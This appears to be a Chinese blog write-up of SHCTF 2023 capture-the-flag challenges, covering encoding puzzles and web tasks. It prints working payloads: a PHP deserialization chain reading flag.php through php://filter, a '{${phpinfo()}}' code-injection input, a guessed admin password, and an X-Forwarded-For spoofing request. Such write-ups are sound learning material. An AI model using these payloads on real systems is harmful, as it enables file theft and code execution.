SHCTF2023wp

最新推荐文章于 2024-06-17 17:35:06 发布
最新推荐文章于 2024-06-17 17:35:06 发布
阅读量383 收藏 11
点赞数 10
文章标签: 网络安全 python 密码学 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74737443/article/details/134701322
版权

文章目录


emmm,做了可能有30题,大部分没记录,然后这些就是记录到了的wp

misc-massage

0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

放入随波逐流,得到Duckspeak解密
SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}

crypto-[WEEK1]黑暗之歌

好好好,这一次成功让我意识到了不能过分依赖于cyberchef

4pms4pmpwrbima/imazima3imazimavimavimarimazima/igJbima/imazCp+KZrMKn4pmvwrbigJbCtuKAluKAluKAlsK24oCW4pmt4pmvwrbigJbimazimazima3igJbima/igJbCtuKZq+KZq+KZrz0=

base64解码得到音符

♬♩¶♯♬♭♬♫♫♪♬♯‖♯♬§♬§♯¶‖¶‖‖‖¶‖♭♯¶‖♬♬♭‖♯‖¶♫♫♯=

直接去音符在线解密,得到
flag{b2cc-9091-8a29}

web-[WEEK1]ez_serialize

<?php
class A
{
   public $var_1;
}
class B
{
   public $q;
}
class C
{
   public $var;
   public $z;
}
class D
{
   public $p;
}
$a = new B();
$b = new C();
$c = new D();
$d = new A();
$a->q = $b;
$b->z = $c;
$c->p = $d;
$d->var_1 = "php://filter/read=convert.base64-encode/resource=flag.php";
echo serialize($a);

payload: /?payload=O:1:"B":1:{s:1:"q";O:1:"C":2:{s:3:"var";N;s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}}

base64解码得到:flag{7b4b9517-b824-4696-9d87-839956ca1a23}

web-[WEEK1]登录就给flag

真登录就给。。。
用户名我们直接输admin,这么简单的题目,又没有什么提示的,那密码就试password喽
flag{6e475611-d8b7-409b-a16f-35947b5bb096}

web-ezphp

/?code={${phpinfo()}}
post:pattern=\S*

flag{13d14cbb-373d-431c-bf18-829ab2183009}

web-生成你的邀请函

POST /generate_invitation HTTP/1.1
Host: 112.6.51.212:32521
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=d33c11ee8dbfed9887197a364a885c6e
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Type: application/json 
Content-Length: 122

{  
    "name": "Yourname",  
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"  
}

然后发送出去,base64解密会得到一张图片,flag就在里面
flag{11fa380b-8f5b-4818-a59a-d3562d92acb7}

Day-Bleeds
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【随波逐流】CTF编码工具 v5.8
qq_21039641的博客
05-28 976
恭喜你发现宝藏站点哦,不妨点进去看看,绝对不会后悔的!
山河shctf2023WP
m0_60088863的博客
11-09 217
纯属菜狗记录~~山河shctf2023WP
SHCTF 2023 misc&web wp
Nanian233的博客
10-30 637
SHCTF2023 misc&web部分wp
SHCTF2023 山河CTF Reverse Week3 --- ststst & easyre WP详解
Sciurdae的博客
10-30 429
这个函数接受一个代码对象(通常是由字符串形式的代码或者编译后的字节码构建而成),并执行其中的 Python 语句exec 是 Python 中的一个内置函数,用于执行动态生成的 Python 代码。上面俩个填写linux上的文件路径,第三个是文件夹,然后还有虚拟机的ip地址,可以用ifconfig查看。之后再用C改为代码,要用force强制处理,之后就是用p创建函数,再反编译。粗略看了就是一个rc4的加密,rc4加密是对称的,因此我们继续将key和check值解密就好。用U全部Undefine一下,
SHCTF2023-校外赛道WP部分
Aluxian_的博客
10-30 1872
SHCTF2023-校外赛道WP部分 由于刚接触CTF没多久 还是属于萌新级别的也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。
SHCTF 2023 新生赛 Web 题解
m0_63138919的博客
10-30 1344
本文为SHCTF 2023新生赛的Web全部题解 供大家学习参考 有问题可以指出
2023SHCTF web方向wp
qq_34942239的博客
11-01 1351
php中{}里面的变量会被解析,这样就能执行phpinfo(),本来一直尝试文件读取,结果flag就在phpinfo里面。传参pattern=.*, .*表示任意字符,code={${phpinfo()}} ,为什么这样写,因为。把$num urldecode之后拼接在flag后面md5加密,然后要与POST的SHCTF相等。下面一个绕过,需要code里面有SHCTF,但是SHCTF前面又不能有东西,这里用回溯绕过。正常的pop链,注意一下php序列化里面的指针用法,把$gao的地址写到$a上。
SHCTF2023 山河CTF Reverse方向week2全WP【详解】
Sciurdae的博客
10-29 764
这里为什么呢,因为这里关于迷宫的数据放在数组里,是以一维数组的形式出现的,如果将一维数组分为 8 * 8的 二维数组 那 -8和+8不就是向上或向下移动 , 如果再将 8 * 8扩展到 8 * 8 * 8 的地步, 那么加 64也就是到下一个 迷宫去了。的时候用的这道题的附件,交了好久的flag一直是错误的,当时真的一点自己做过这题的记忆都没有 奇怪。sudu函数里面的内容,是一个 9 * 9 的数独表,大致意思是如果map索引位置为真,我们的输入就是0,如果为假的话,就将我们的数字填入。
SHCTF2023-校外赛道WP部分_shctf校外赛道 week1 wp
2301_77121488的博客
05-17 561
由于刚接触CTF没多久 还是属于萌新级别的也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。
2023年江西省工业互联网大赛WP
12-25
2023年江西省工业互联网大赛WP
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8293
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
人脸识别系统---人脸对比
2303_77278243的博客
06-14 741
def select_image(): #定义选择图片的函数#指明label_var不是一个局部变量也不是全局变量,而是外部函数s1的参数。这样,select_image函数就可以修改s1函数的参数#弹出选择文件的对话框,以及被选择文件的类型file_path = filedialog.askopenfilename(title="选择图片",filetypes=(("图片文件", "*.png;*.jpg;*.jpeg;*.bmp"),("所有文件", "*.*")))#如果选择了文件。
第9章 类
最新发布
我走的每一步都算数
06-17 891
让一个类继承另一个类后,就可以添加区分子类和父类所需的新属性和新方法了。class Car:class ElectricCar(Car): # 继承Carself.battery = 85 # 新属性mycar = ElectricCar(2024, 'Au', 'A7') # 创建实例mycar.prt_battery() # 新方法熟悉Python 提供的选项,这样才能确定哪种组织方式是最佳的,并能理解别人开发的项目。
python迁移数据教程
2402_85292291的博客
06-13 725
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: 1. 引用给出了一个数学公式 C = A * M,其中 C包含flag的字符。 2. 引用提到了coppersmith算法,只要知道p的高位,就可以解密密码。 3. 引用介绍了一个函数corrupt(),它可以随机改变矩阵A中的元素,但有很大的可能性存在两行或更多的行没有发生变化。 根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Day-Bleeds

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值